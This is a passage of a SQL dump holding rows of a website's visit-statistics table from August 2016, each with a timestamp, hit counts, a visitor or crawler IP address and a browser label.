.249.64.24',''),(54023,1470263935,1,1,0,0,'94.179.69.146','chrome'),(54024,1470264180,1,0,1,0,'66.249.64.59',''),(54025,1470264699,1,0,1,0,'66.249.64.24',''),(54026,1470265579,1,0,1,0,'66.249.64.21',''),(54027,1470267145,1,1,0,0,'157.55.39.28','other'),(54028,1470267699,1,0,1,0,'66.249.64.27',''),(54029,1470267797,2,2,0,0,'157.55.39.13','other'),(54030,1470267988,1,1,0,0,'164.132.161.60','other'),(54031,1470268006,1,1,0,0,'130.193.50.34','other'),(54032,1470268075,2,2,0,0,'141.8.183.25','other'),(54033,1470268366,1,1,0,0,'141.8.142.58','other'),(54034,1470269093,1,0,1,0,'66.249.64.21',''),(54035,1470269252,1,1,0,0,'130.193.51.19','other'),(54036,1470269933,1,1,0,0,'141.8.142.58','other'),(54037,1470270531,1,1,0,0,'157.55.39.13','other'),(54038,1470270752,1,1,0,0,'151.80.31.164','other'),(54039,1470270861,1,0,1,0,'66.249.64.27',''),(54040,1470270998,1,0,1,0,'66.249.64.24',''),(54041,1470271071,1,1,0,0,'141.8.142.61','other'),(54042,1470272219,1,0,1,0,'66.249.64.21',''),(54043,1470273240,1,0,1,0,'66.249.64.24',''),(54044,1470273404,1,0,1,0,'66.249.64.59',''),(54045,1470274037,1,1,0,0,'208.115.113.92','other'),(54046,1470274457,1,0,1,0,'66.249.64.27',''),(54047,1470274533,1,0,1,0,'66.249.64.24',''),(54048,1470275074,1,1,0,0,'141.8.142.85','other'),(54049,1470275075,1,1,0,0,'130.193.50.4','other'),(54050,1470276382,1,0,1,0,'66.249.64.61',''),(54051,1470276437,1,1,0,0,'141.8.132.10','other'),(54052,1470276438,1,1,0,0,'93.158.152.40','other'),(54053,1470276599,1,1,0,0,'130.193.37.7','other'),(54054,1470276796,1,1,0,0,'5.255.253.68','other'),(54055,1470276872,1,0,1,0,'66.249.64.57',''),(54056,1470277066,1,0,1,0,'66.249.64.27',''),(54057,1470278953,1,1,0,0,'66.249.64.27','chrome'),(54058,1470279811,1,1,0,0,'66.249.64.59','chrome'),(54059,1470280310,1,0,1,0,'66.249.64.27',''),(54060,1470280672,1,1,0,0,'151.80.31.169','other'),(54061,1470281470,1,1,0,0,'91.196.178.39','chrome'),(54062,1470281620,1,1,0,0,'66.249.64.57','chrome'),(54063,1470281837,1,1,0,0,'51.255.65.88','other'),(54064,1470282261,1,0,1,0,'66.249.64.24',''),(54065,1470283192,1,1,0,0,'51.255.65.14','other'),(54066,1470283480,1,1,0,0,'207.46.13.140','other'),(54067,1470283613,1,1,0,0,'51.255.65.30','other'),(54068,1470284755,1,1,0,0,'208.115.113.82','other'),(54069,1470284911,1,1,0,0,'164.132.161.92','other'),(54070,1470285995,1,0,1,0,'66.249.64.24',''),(54071,1470286853,1,1,0,0,'178.93.148.204','other'),(54072,1470286864,1,1,0,0,'208.115.113.82','other'),(54073,1470286944,1,1,0,0,'164.132.161.71','other'),(54074,1470287289,1,1,0,0,'207.46.13.191','other'),(54075,1470288188,1,1,0,0,'151.80.31.168','other'),(54076,1470288565,1,1,0,0,'91.196.178.66','chrome'),(54077,1470288884,1,1,0,0,'207.46.13.140','other'),(54078,1470288978,1,1,0,0,'91.196.178.70','chrome'),(54079,1470289371,1,0,1,0,'66.249.64.21',''),(54080,1470289432,1,1,0,0,'66.249.93.113','chrome'),(54081,1470289830,1,1,0,0,'208.115.113.92','other'),(54082,1470289889,1,1,0,0,'51.255.65.75','other'),(54083,1470290120,1,1,0,0,'92.113.188.143','chrome'),(54084,1470290258,2,0,2,0,'66.249.64.24',''),(54085,1470290392,1,1,0,0,'51.255.65.92','other'),(54086,1470291212,1,1,0,0,'51.255.65.65','other'),(54087,1470291237,1,1,0,0,'94.179.54.113','firefox'),(54088,1470291293,1,0,1,0,'66.249.64.27',''),(54089,1470291417,1,1,0,0,'212.55.85.134','chrome'),(54090,1470292603,1,1,0,0,'130.180.211.167','chrome'),(54091,1470293062,1,1,0,0,'51.255.65.36','other'),(54092,1470293157,1,1,0,0,'91.196.177.15','chrome'),(54093,1470293912,1,1,0,0,'51.255.65.42','other'),(54094,1470293965,1,0,1,0,'68.180.230.111',''),(54095,1470294050,1,1,0,0,'164.132.161.79','other'),(54096,1470294066,1,1,0,0,'62.80.185.138','firefox'),(54097,1470294445,1,0,1,0,'66.249.64.61',''),(54098,1470294478,1,1,0,0,'37.53.142.222','chrome'),(54099,1470294886,1,1,0,0,'94.179.42.115','firefox'),(54100,1470294905,1,1,0,0,'37.55.123.131','chrome'),(54101,1470294933,1,1,0,0,'141.8.183.25','other'),(54102,1470295364,1,0,1,0,'66.249.64.21',''),(54103,1470295489,1,1,0,0,'66.249.88.93','chrome'),(54104,1470295539,1,1,0,0,'93.158.152.84','other'),(54105,1470295907,1,1,0,0,'178.94.20.90','chrome'),(54106,1470296118,1,1,0,0,'91.196.178.70','opera'),(54107,1470296293,1,1,0,0,'164.132.161.28','other'),(54108,1470296358,1,1,0,0,'207.46.13.140','other'),(54109,1470296774,1,1,0,0,'51.255.65.70','other'),(54110,1470297814,1,1,0,0,'91.196.178.69','firefox'),(54111,1470297966,1,1,0,0,'151.80.31.159','other'),(54112,1470298174,1,0,1,0,'66.249.64.24',''),(54113,1470298192,1,1,0,0,'94.179.82.32','chrome'),(54114,1470298202,1,1,0,0,'178.154.189.37','other'),(54115,1470298267,1,1,0,0,'91.196.178.34','firefox'),(54116,1470298819,1,1,0,0,'130.180.217.72','firefox'),(54117,1470299100,1,1,0,0,'164.132.161.84','other'),(54118,1470299155,1,1,0,0,'151.80.31.155','other'),(54119,1470299374,2,2,0,0,'193.111.140.106','other'),(54120,1470300064,1,1,0,0,'194.242.103.139','chrome'),(54121,1470300150,1,0,1,0,'66.249.64.57',''),(54122,1470300213,1,1,0,0,'51.255.65.73','other'),(54123,1470300972,1,1,0,0,'164.132.161.12','other'),(54124,1470301718,1,1,0,0,'37.52.23.94','firefox'),(54125,1470301895,1,1,0,0,'157.55.39.169','other'),(54126,1470302232,1,1,0,0,'164.132.161.80','other'),(54127,1470302350,1,1,0,0,'91.196.178.66','firefox'),(54128,1470302775,1,0,1,0,'66.249.64.24',''),(54129,1470302968,1,1,0,0,'164.132.161.17','other'),(54130,1470303429,3,3,0,0,'91.196.178.71','firefox'),(54131,1470303931,1,1,0,0,'51.255.65.86','other'),(54132,1470304173,1,1,0,0,'164.132.161.12','other'),(54133,1470304310,1,0,1,0,'66.249.64.27',''),(54134,1470304706,1,0,1,0,'66.249.64.57',''),(54135,1470304828,1,1,0,0,'51.255.65.29','other'),(54136,1470305220,1,1,0,0,'130.193.51.74','other'),(54137,1470305305,1,1,0,0,'141.8.142.58','other'),(54138,1470305403,1,1,0,0,'141.8.183.25','other'),(54139,1470305483,1,1,0,0,'141.8.183.19','other'),(54140,1470306984,1,1,0,0,'37.53.225.73','chrome'),(54141,1470307130,1,0,1,0,'66.249.64.61',''),(54142,1470307267,12,12,0,0,'209.126.127.49','other'),(54143,1470307504,2,2,0,0,'144.76.8.132','other'),(54144,1470308184,1,1,0,0,'195.137.233.100','chrome'),(54145,1470308267,1,1,0,0,'94.179.82.32','chrome'),(54146,1470309321,1,1,0,0,'91.196.178.67','chrome'),(54147,1470310688,1,1,0,0,'213.5.192.9','chrome'),(54148,1470310712,1,1,0,0,'91.196.178.67','chrome'),(54149,1470311063,1,1,0,0,'51.255.65.74','other'),(54150,1470311150,1,1,0,0,'51.255.65.13','other'),(54151,1470311594,1,1,0,0,'51.255.65.35','other'),(54152,1470311617,1,1,0,0,'92.112.104.209','chrome'),(54153,1470312965,1,0,1,0,'66.249.64.27',''),(54154,1470313271,1,0,1,0,'66.249.64.24',''),(54155,1470313708,1,1,0,0,'157.55.39.169','other'),(54156,1470314545,1,1,0,0,'89.163.148.22','other'),(54157,1470314666,1,1,0,0,'164.132.161.96','other'),(54158,1470315568,1,1,0,0,'91.196.178.104','chrome'),(54159,1470315654,1,1,0,0,'37.53.184.59','chrome'),(54160,1470315662,1,1,0,0,'164.132.161.96','other'),(54161,1470316393,1,1,0,0,'51.255.65.64','other'),(54162,1470316789,1,1,0,0,'91.196.178.69','firefox'),(54163,1470316925,3,3,0,0,'130.193.50.34','other'),(54164,1470316954,1,1,0,0,'51.255.65.88','other'),(54165,1470317106,1,1,0,0,'141.8.183.25','other'),(54166,1470317313,1,1,0,0,'51.255.65.57','other'),(54167,1470317318,1,1,0,0,'130.193.51.19','other'),(54168,1470317441,1,1,0,0,'141.8.142.58','other'),(54169,1470317720,1,1,0,0,'141.8.142.61','other'),(54170,1470318550,1,1,0,0,'130.193.51.19','other'),(54171,1470318556,1,1,0,0,'141.8.183.25','other'),(54172,1470318557,1,1,0,0,'91.196.178.69','chrome'),(54173,1470318796,1,1,0,0,'91.196.178.68','firefox'),(54174,1470319050,1,1,0,0,'164.132.161.49','other'),(54175,1470319054,1,1,0,0,'141.8.142.67','other'),(54177,1470319221,1,1,0,0,'141.8.142.58','other'),(54178,1470319288,1,0,1,0,'66.249.64.59',''),(54179,1470319296,1,1,0,0,'151.80.31.169','other'),(54180,1470319427,1,1,0,0,'151.80.31.170','other'),(54181,1470319719,1,1,0,0,'91.196.178.71','firefox'),(54182,1470320022,1,1,0,0,'91.124.48.219','other'),(54183,1470320037,1,1,0,0,'37.54.20.245','chrome'),(54184,1470320729,1,0,1,0,'66.249.64.24',''),(54185,1470320946,1,1,0,0,'37.54.20.245','chrome'),(54186,1470321458,1,1,0,0,'141.8.142.61','other'),(54187,1470321721,1,1,0,0,'141.8.142.58','other'),(54188,1470321887,1,1,0,0,'164.132.161.63','other'),(54189,1470322092,1,0,1,0,'66.249.64.21',''),(54190,1470322628,1,1,0,0,'164.132.161.30','other'),(54191,1470323180,1,1,0,0,'66.249.64.21','chrome'),(54192,1470323364,1,1,0,0,'66.249.64.61','chrome'),(54193,1470323819,1,1,0,0,'141.8.183.19','other'),(54194,1470323831,1,1,0,0,'207.46.13.140','other'),(54195,1470324704,1,1,0,0,'51.255.65.9','other'),(54196,1470324758,1,1,0,0,'164.132.161.95','other'),(54197,1470325176,1,1,0,0,'37.55.226.14','firefox'),(54198,1470325620,1,1,0,0,'51.255.65.2','other'),(54199,1470326560,53,53,0,0,'193.111.140.106','other'),(54200,1470326565,47,47,0,0,'85.14.244.98','other'),(54201,1470326570,41,41,0,0,'85.14.244.113','other'),(54202,1470327231,1,1,0,0,'164.132.161.78','other'),(54203,1470328085,1,1,0,0,'91.196.178.98','chrome'),(54204,1470328652,1,1,0,0,'51.255.65.41','other'),(54205,1470329152,1,1,0,0,'157.55.39.169','other'),(54206,1470329456,1,1,0,0,'51.255.65.34','other'),(54207,1470329533,1,1,0,0,'208.115.113.92','other'),(54208,1470329728,121,121,0,0,'46.165.197.142','other'),(54209,1470330033,1,1,0,0,'141.8.142.58','other'),(54210,1470330313,1,1,0,0,'164.132.161.44','other'),(54211,1470330368,1,1,0,0,'91.196.178.101','firefox'),(54212,1470330385,1,1,0,0,'94.179.12.152','chrome'),(54213,1470330818,1,1,0,0,'130.193.51.19','other'),(54214,1470330928,2,2,0,0,'141.8.142.67','other'),(54215,1470331604,1,1,0,0,'141.8.142.58','other'),(54216,1470332435,1,1,0,0,'208.115.113.92','other'),(54217,1470333045,1,1,0,0,'164.132.161.71','other'),(54218,1470333080,1,1,0,0,'151.80.31.107','other'),(54219,1470334497,1,1,0,0,'151.80.31.166','other'),(54220,1470334587,2,2,0,0,'141.8.142.58','other'),(54221,1470334601,1,0,1,0,'66.249.69.155',''),(54222,1470334830,2,0,2,0,'66.249.75.81',''),(54223,1470334892,2,0,2,0,'66.249.69.149',''),(54224,1470334911,1,1,0,0,'51.255.65.86','other'),(54225,1470335541,1,1,0,0,'51.255.65.74','other'),(54226,1470335599,1,1,0,0,'66.249.75.48','chrome'),(54227,1470336364,1,0,1,0,'66.249.75.32',''),(54228,1470336786,1,1,0,0,'130.193.50.34','other'),(54229,1470336887,1,0,1,0,'66.249.69.152',''),(54230,1470337092,2,2,0,0,'130.193.51.19','other'),(54231,1470337452,1,1,0,0,'151.80.31.157','other'),(54232,1470337623,1,0,1,0,'66.249.75.40',''),(54233,1470337625,2,2,0,0,'141.8.142.58','other'),(54234,1470337699,1,0,1,0,'66.249.75.32',''),(54235,1470337705,1,0,1,0,'66.249.75.88',''),(54236,1470338145,1,1,0,0,'208.115.113.92','other'),(54237,1470338542,1,1,0,0,'151.80.31.182','other'),(54238,1470338579,1,1,0,0,'51.255.65.31','other'),(54239,1470338834,2,2,0,0,'141.8.183.25','other'),(54240,1470339157,2,2,0,0,'130.193.50.34','other'),(54241,1470339413,1,1,0,0,'130.193.51.19','other'),(54242,1470339471,1,1,0,0,'37.115.137.252','chrome'),(54243,1470339535,1,1,0,0,'164.132.161.62','other'),(54244,1470339668,1,1,0,0,'130.180.210.110','chrome'),(54245,1470340773,1,1,0,0,'130.193.50.34','other'),(54246,1470341232,1,1,0,0,'51.255.65.47','other'),(54247,1470343311,1,1,0,0,'180.76.15.142','other'),(54248,1470343584,1,0,1,0,'66.249.75.40',''),(54249,1470343708,1,1,0,0,'141.8.142.61','other'),(54250,1470344002,1,1,0,0,'51.255.65.22','other'),(54251,1470344803,1,1,0,0,'130.193.50.34','other'),(54252,1470345460,1,1,0,0,'51.255.65.92','other'),(54253,1470346124,1,1,0,0,'51.255.65.88','other'),(54254,1470346268,1,0,1,0,'66.249.75.32',''),(54255,1470346503,1,1,0,0,'91.196.178.166','chrome'),(54256,1470346650,1,1,0,0,'130.180.210.236','chrome'),(54257,1470348097,1,0,1,0,'66.249.69.149',''),(54258,1470348136,1,1,0,0,'51.255.65.73','other'),(54259,1470349265,1,1,0,0,'51.255.65.33','other'),(54260,1470349594,1,0,1,0,'66.249.75.40',''),(54261,1470350164,1,1,0,0,'164.132.161.7','other'),(54262,1470350710,1,1,0,0,'141.8.142.58','other'),(54263,1470351032,1,1,0,0,'66.249.75.48','chrome'),(54264,1470351599,1,1,0,0,'130.193.50.34','other'),(54265,1470352411,1,1,0,0,'180.76.15.151','other'),(54266,1470352502,1,1,0,0,'93.158.152.84','other'),(54267,1470352676,1,1,0,0,'141.8.142.61','other'),(54268,1470352789,1,1,0,0,'130.193.51.19','other'),(54269,1470352908,4,4,0,0,'141.8.142.58','other'),(54270,1470353033,2,2,0,0,'141.8.183.25','other'),(54271,1470353124,1,1,0,0,'141.8.142.67','other'),(54272,1470353273,2,2,0,0,'130.193.50.34','other'),(54273,1470353463,1,0,1,0,'66.249.69.189',''),(54274,1470353781,1,1,0,0,'208.115.113.92','other'),(54275,1470353901,1,1,0,0,'51.255.65.69','other'),(54276,1470354396,1,0,1,0,'66.249.75.95',''),(54277,1470355712,1,0,1,0,'66.249.75.40',''),(54278,1470356300,1,1,0,0,'130.193.51.19','other'),(54279,1470356641,1,0,1,0,'66.249.69.187',''),(54280,1470356844,1,1,0,0,'151.80.31.182','other'),(54281,1470357119,2,2,0,0,'141.8.142.58','other'),(54282,1470357563,1,1,0,0,'130.193.50.34','other'),(54283,1470358007,1,1,0,0,'141.8.183.25','other'),(54284,1470358145,1,1,0,0,'130.193.51.79','other'),(54285,1470358755,1,0,1,0,'66.249.75.95',''),(54286,1470361528,1,0,1,0,'66.249.75.32',''),(54287,1470362810,1,1,0,0,'164.132.161.75','other'),(54288,1470363028,1,1,0,0,'51.255.65.55','other'),(54289,1470363773,2,2,0,0,'130.193.51.19','other'),(54290,1470363953,1,1,0,0,'164.132.161.46','other'),(54291,1470364031,1,1,0,0,'164.132.161.26','other'),(54292,1470364767,1,1,0,0,'141.8.142.58','other'),(54293,1470364904,1,1,0,0,'130.193.51.19','other'),(54294,1470365074,1,1,0,0,'141.8.142.61','other'),(54295,1470365225,1,1,0,0,'180.76.15.16','other'),(54296,1470365238,1,1,0,0,'208.115.113.92','other'),(54297,1470365666,1,1,0,0,'130.193.50.34','other'),(54298,1470366336,1,1,0,0,'141.8.142.58','other'),(54299,1470366841,1,1,0,0,'180.76.15.137','other'),(54300,1470367700,1,1,0,0,'107.167.109.158','other'),(54301,1470368652,1,1,0,0,'176.15.230.19','opera'),(54303,1470368653,1,1,0,0,'176.195.97.234','chrome'),(54304,1470370154,1,1,0,0,'130.193.50.34','other'),(54305,1470370279,1,1,0,0,'141.8.183.25','other'),(54306,1470370431,1,1,0,0,'157.55.39.80','other'),(54307,1470370468,1,1,0,0,'51.255.65.61','other'),(54308,1470370590,1,1,0,0,'176.77.4.37','msie'),(54309,1470370596,1,1,0,0,'95.221.235.208','msie'),(54310,1470370783,1,1,0,0,'37.52.42.249','chrome'),(54311,1470372193,1,1,0,0,'188.40.95.70','other'),(54312,1470372509,4,4,0,0,'173.234.153.122','other'),(54313,1470372628,1,1,0,0,'194.242.103.188','chrome'),(54314,1470372801,1,1,0,0,'164.132.161.89','other'),(54315,1470373077,1,1,0,0,'157.55.39.184','other'),(54316,1470373618,1,1,0,0,'51.255.65.25','other'),(54317,1470373998,1,1,0,0,'91.196.178.67','chrome'),(54318,1470374036,1,1,0,0,'141.8.183.25','other'),(54319,1470374484,1,1,0,0,'130.193.50.34','other'),(54320,1470375370,1,1,0,0,'141.8.142.61','other'),(54321,1470375607,1,1,0,0,'66.249.93.117','chrome'),(54322,1470375697,1,1,0,0,'94.179.78.115','chrome'),(54323,1470375830,1,1,0,0,'164.132.161.79','other'),(54324,1470375860,1,1,0,0,'94.179.71.232','firefox'),(54325,1470376655,1,1,0,0,'93.158.152.51','other'),(54326,1470376794,1,1,0,0,'91.196.179.33','chrome'),(54327,1470377179,1,0,1,0,'66.249.69.185',''),(54328,1470377218,1,1,0,0,'130.193.50.4','other'),(54329,1470377342,1,1,0,0,'51.255.65.31','other'),(54330,1470378238,1,0,1,0,'66.249.69.187',''),(54331,1470378304,1,0,1,0,'66.249.69.189',''),(54332,1470378309,1,1,0,0,'141.8.142.58','other'),(54333,1470378549,1,1,0,0,'130.193.50.34','other'),(54334,1470378550,1,1,0,0,'91.196.178.71','firefox'),(54335,1470378843,1,1,0,0,'141.8.142.61','other'),(54336,1470379238,1,1,0,0,'151.80.31.100','other'),(54337,1470379460,1,0,1,0,'66.249.69.187',''),(54338,1470380031,1,1,0,0,'51.255.65.97','other'),(54339,1470381020,1,0,1,0,'66.249.69.149',''),(54340,1470381145,1,1,0,0,'207.46.13.71','other'),(54341,1470381504,1,1,0,0,'157.55.39.80','other'),(54342,1470381710,1,1,0,0,'91.196.178.71','chrome'),(54343,1470381850,1,1,0,0,'95.133.37.105','firefox'),(54344,1470381857,1,1,0,0,'164.132.161.92','other'),(54345,1470382717,1,1,0,0,'37.53.229.100','chrome'),(54346,1470383476,1,1,0,0,'37.52.42.249','chrome'),(54347,1470383751,1,1,0,0,'95.132.104.231','chrome'),(54348,1470384292,2,2,0,0,'141.8.183.25','other'),(54349,1470384985,1,1,0,0,'130.193.50.34','other'),(54350,1470385147,1,1,0,0,'141.8.142.61','other'),(54351,1470385782,1,1,0,0,'37.53.122.15','chrome'),(54352,1470386484,1,1,0,0,'91.196.178.133','other'),(54353,1470386738,1,1,0,0,'37.53.122.15','chrome'),(54354,1470386951,1,1,0,0,'91.196.178.71','firefox'),(54355,1470387081,1,1,0,0,'164.132.161.46','other'),(54356,1470387111,1,1,0,0,'51.255.65.58','other'),(54357,1470387202,1,1,0,0,'82.207.91.234','firefox'),(54358,1470387239,1,1,0,0,'37.54.20.41','chrome'),(54359,1470387287,1,1,0,0,'37.52.22.68','firefox'),(54360,1470387475,1,1,0,0,'194.1.193.15','opera'),(54361,1470387486,1,1,0,0,'157.55.39.184','other'),(54362,1470387771,1,1,0,0,'91.196.178.133','other'),(54363,1470387856,1,1,0,0,'94.179.126.154','chrome'),(54364,1470387917,1,1,0,0,'79.137.183.0','chrome'),(54365,1470388593,1,1,0,0,'157.55.39.184','other'),(54366,1470388943,2,2,0,0,'141.8.142.61','other'),(54367,1470391016,1,1,0,0,'130.193.51.19','other'),(54368,1470391506,3,3,0,0,'141.8.142.61','other'),(54369,1470391680,2,2,0,0,'141.8.183.25','other'),(54370,1470391888,1,1,0,0,'164.132.161.56','other'),(54371,1470391914,1,0,1,0,'66.249.65.177',''),(54372,1470392075,1,1,0,0,'54.175.254.137','other'),(54373,1470392362,2,2,0,0,'130.193.50.34','other'),(54374,1470392381,1,1,0,0,'178.95.243.25','chrome'),(54375,1470392496,1,1,0,0,'130.193.51.19','other'),(54376,1470392901,2,2,0,0,'141.8.142.67','other'),(54377,1470393004,2,2,0,0,'141.8.183.25','other'),(54378,1470393278,1,1,0,0,'130.193.50.34','other'),(54379,1470393558,1,0,1,0,'66.249.69.189',''),(54380,1470393711,1,1,0,0,'141.8.142.61','other'),(54381,1470393907,1,1,0,0,'51.255.65.65','other'),(54382,1470393962,1,1,0,0,'164.132.161.44','other'),(54383,1470394643,1,1,0,0,'66.249.81.202','chrome'),(54384,1470395366,1,1,0,0,'91.196.178.101','chrome'),(54385,1470395692,1,0,1,0,'66.249.69.189',''),(54386,1470395790,1,0,1,0,'66.249.69.155',''),(54387,1470396102,1,1,0,0,'91.196.178.67','chrome'),(54388,1470396264,1,1,0,0,'51.255.65.3','other'),(54389,1470397412,1,1,0,0,'31.41.70.14','chrome'),(54390,1470397480,1,1,0,0,'91.196.178.101','chrome'),(54391,1470398830,1,1,0,0,'51.255.65.33','other'),(54392,1470398913,1,1,0,0,'91.196.178.68','firefox'),(54393,1470399208,1,1,0,0,'164.132.161.96','other'),(54394,1470400394,1,1,0,0,'164.132.161.41','other'),(54395,1470401094,1,0,1,0,'66.249.69.187',''),(54396,1470405206,1,1,0,0,'66.249.75.48','chrome'),(54397,1470405310,1,1,0,0,'91.196.178.65','firefox'),(54398,1470406123,1,1,0,0,'91.124.239.118','firefox'),(54399,1470408059,1,1,0,0,'77.88.202.165','firefox'),(54400,1470408233,1,1,0,0,'94.179.78.115','chrome'),(54401,1470408373,1,1,0,0,'158.69.235.127','firefox'),(54402,1470408756,33,33,0,0,'69.197.163.195','other'),(54403,1470409292,1,1,0,0,'212.55.72.44','chrome'),(54404,1470409376,1,1,0,0,'95.158.42.244','chrome'),(54405,1470409535,1,1,0,0,'91.196.178.133','chrome'),(54406,1470410932,1,1,0,0,'95.158.42.244','chrome'),(54407,1470410955,1,1,0,0,'130.193.51.19','other'),(54408,1470412237,1,1,0,0,'91.121.181.101','other'),(54409,1470413663,1,1,0,0,'164.132.161.48','other'),(54410,1470414544,1,1,0,0,'164.132.161.26','other'),(54411,1470414764,1,0,1,0,'66.249.64.185',''),(54412,1470415922,1,1,0,0,'188.239.32.177','chrome'),(54413,1470415950,1,1,0,0,'164.132.161.91','other'),(54414,1470416120,1,1,0,0,'51.255.65.19','other'),(54415,1470417768,1,1,0,0,'164.132.161.20','other'),(54416,1470418144,1,1,0,0,'164.132.161.36','other'),(54417,1470418335,1,1,0,0,'164.132.161.15','other'),(54418,1470418419,1,1,0,0,'164.132.161.25','other'),(54419,1470419252,1,1,0,0,'91.196.178.136','chrome'),(54420,1470420084,1,1,0,0,'130.193.51.14','other'),(54421,1470420253,1,1,0,0,'93.158.152.40','other'),(54422,1470420279,1,1,0,0,'164.132.161.71','other'),(54423,1470420346,1,1,0,0,'164.132.161.23','other'),(54424,1470420509,1,1,0,0,'51.255.65.90','other'),(54425,1470421218,1,1,0,0,'180.76.15.157','other'),(54426,1470422241,1,0,1,0,'66.249.64.155',''),(54427,1470422264,1,0,1,0,'66.249.64.185',''),(54428,1470423427,6,6,0,0,'144.76.8.132','other'),(54429,1470423662,2,2,0,0,'144.76.12.75','other'),(54430,1470424425,1,1,0,0,'91.196.178.38','chrome'),(54431,1470424506,1,0,1,0,'66.249.64.152',''),(54432,1470424536,1,1,0,0,'119.147.146.189','chrome'),(54433,1470424567,1,1,0,0,'119.147.146.194','chrome'),(54434,1470424695,1,1,0,0,'91.196.178.102','chrome'),(54435,1470425029,1,1,0,0,'157.55.39.169','other'),(54436,1470425196,1,1,0,0,'141.0.14.224','other'),(54437,1470425273,1,1,0,0,'176.119.92.117','chrome'),(54438,1470425741,1,0,1,0,'66.249.64.185',''),(54439,1470425990,1,1,0,0,'164.132.161.41','other'),(54440,1470426190,1,1,0,0,'151.80.31.102','other'),(54441,1470426645,2,1,1,0,'66.249.64.185',''),(54442,1470426661,1,1,0,0,'51.255.65.97','other'),(54443,1470426694,1,1,0,0,'151.80.31.183','other'),(54444,1470426726,1,1,0,0,'66.249.64.155','chrome'),(54445,1470426913,1,1,0,0,'51.255.65.28','other'),(54446,1470427013,1,1,0,0,'51.255.65.46','other'),(54447,1470427029,1,1,0,0,'51.255.65.4','other'),(54448,1470427054,1,1,0,0,'164.132.161.43','other'),(54449,1470427719,1,1,0,0,'51.255.207.3','other'),(54450,1470427777,1,1,0,0,'51.255.65.2','other'),(54451,1470427833,1,0,1,0,'66.249.64.149',''),(54452,1470427872,1,1,0,0,'51.255.65.94','other'),(54453,1470428431,1,0,1,0,'66.249.64.152',''),(54454,1470428789,1,1,0,0,'51.255.65.96','other'),(54455,1470429205,1,1,0,0,'51.255.65.34','other'),(54456,1470430108,1,1,0,0,'178.93.150.26','chrome'),(54457,1470430148,7,7,0,0,'69.30.198.202','other'),(54458,1470430285,1,1,0,0,'51.255.65.28','other'),(54459,1470430342,1,1,0,0,'151.80.31.164','other'),(54460,1470430848,1,1,0,0,'130.180.216.38','chrome'),(54461,1470431093,156,156,0,0,'192.187.104.235','other'),(54462,1470431242,1,1,0,0,'51.255.65.8','other'),(54463,1470431711,1,0,1,0,'66.249.64.152',''),(54464,1470431969,1,1,0,0,'164.132.161.83','other'),(54465,1470432157,1,1,0,0,'51.255.65.47','other'),(54466,1470432630,1,1,0,0,'51.255.65.49','other'),(54467,1470432835,1,1,0,0,'151.80.31.159','other'),(54468,1470433253,1,0,1,0,'66.249.64.189',''),(54469,1470433261,1,1,0,0,'164.132.161.18','other'),(54470,1470433266,1,1,0,0,'164.132.161.12','other'),(54471,1470433387,1,0,1,0,'66.249.64.155',''),(54472,1470433394,2,0,2,0,'66.249.64.152',''),(54473,1470433995,1,1,0,0,'51.255.65.84','other'),(54474,1470434022,1,1,0,0,'164.132.161.84','other'),(54475,1470434300,1,0,1,0,'66.249.64.187',''),(54476,1470435142,1,0,1,0,'66.249.64.152',''),(54477,1470436179,1,0,1,0,'66.249.64.149',''),(54478,1470436683,1,1,0,0,'66.249.64.187','chrome'),(54479,1470437070,1,1,0,0,'51.255.65.97','other'),(54480,1470439916,1,0,1,0,'66.249.64.155',''),(54481,1470440980,1,0,1,0,'66.249.64.189',''),(54482,1470441285,1,0,1,0,'66.249.64.185',''),(54483,1470441599,1,0,1,0,'66.249.64.187',''),(54484,1470441796,1,0,1,0,'66.249.64.152',''),(54485,1470443068,1,1,0,0,'164.132.161.96','other'),(54486,1470443975,1,1,0,0,'51.255.65.24','other'),(54487,1470445342,11,11,0,0,'162.210.196.98','other'),(54488,1470445391,1,1,0,0,'51.255.65.45','other'),(54489,1470445458,1,1,0,0,'208.115.113.82','other'),(54490,1470445941,1,1,0,0,'51.255.65.53','other'),(54491,1470446236,1,0,1,0,'66.249.64.189',''),(54492,1470446269,2,0,2,0,'66.249.64.152',''),(54493,1470446933,1,1,0,0,'66.249.64.187','chrome'),(54494,1470447831,1,1,0,0,'151.80.31.168','other'),(54495,1470447944,1,0,1,0,'66.249.64.149',''),(54496,1470448284,1,1,0,0,'157.55.39.184','other'),(54497,1470448517,2,0,2,0,'66.249.64.185',''),(54498,1470449042,1,1,0,0,'157.55.39.181','other'),(54499,1470449219,3,0,3,0,'66.249.64.189',''),(54500,1470449438,1,0,1,0,'66.249.64.187',''),(54501,1470450203,1,1,0,0,'157.55.39.184','other'),(54502,1470450518,1,1,0,0,'180.76.15.5','other'),(54503,1470450578,1,0,1,0,'66.249.64.187',''),(54504,1470451100,1,1,0,0,'51.255.65.51','other'),(54505,1470451593,1,1,0,0,'51.255.65.68','other'),(54506,1470454496,1,1,0,0,'157.55.39.181','other'),(54507,1470454539,1,1,0,0,'151.80.31.179','other'),(54508,1470455988,1,1,0,0,'157.55.39.184','other'),(54509,1470456698,1,0,1,0,'66.249.64.189',''),(54510,1470457107,1,0,1,0,'66.249.64.185',''),(54511,1470458072,1,1,0,0,'212.55.72.44','chrome'),(54512,1470459787,1,1,0,0,'51.255.65.19','other'),(54513,1470460250,1,1,0,0,'157.55.39.184','other'),(54514,1470460473,1,0,1,0,'66.249.64.149',''),(54515,1470460927,1,1,0,0,'51.255.65.34','other'),(54516,1470461929,1,1,0,0,'66.102.9.93','chrome'),(54517,1470462530,1,1,0,0,'164.132.161.12','other'),(54518,1470463191,1,1,0,0,'164.132.161.9','other'),(54519,1470464148,1,1,0,0,'51.255.65.28','other'),(54520,1470465056,2,0,2,0,'66.249.64.189',''),(54521,1470465392,2,2,0,0,'91.196.178.162','chrome'),(54522,1470466865,1,1,0,0,'51.255.65.4','other'),(54523,1470467701,1,1,0,0,'164.132.161.5','other'),(54524,1470467789,1,1,0,0,'51.255.65.4','other'),(54525,1470467975,1,1,0,0,'164.132.161.55','other'),(54526,1470468296,1,1,0,0,'157.55.39.184','other'),(54527,1470468867,1,0,1,0,'66.249.64.149',''),(54528,1470470636,1,0,1,0,'66.249.64.185',''),(54529,1470470711,1,1,0,0,'180.76.15.29','other'),(54530,1470470913,1,1,0,0,'180.76.15.13','other'),(54531,1470471257,1,1,0,0,'51.255.65.57','other'),(54532,1470473305,1,0,1,0,'68.180.230.111',''),(54533,1470473587,1,1,0,0,'207.46.13.19','other'),(54534,1470473666,1,1,0,0,'94.179.87.51','firefox'),(54535,1470474384,1,1,0,0,'51.255.65.45','other'),(54536,1470475466,1,1,0,0,'164.132.161.76','other'),(54537,1470475634,1,1,0,0,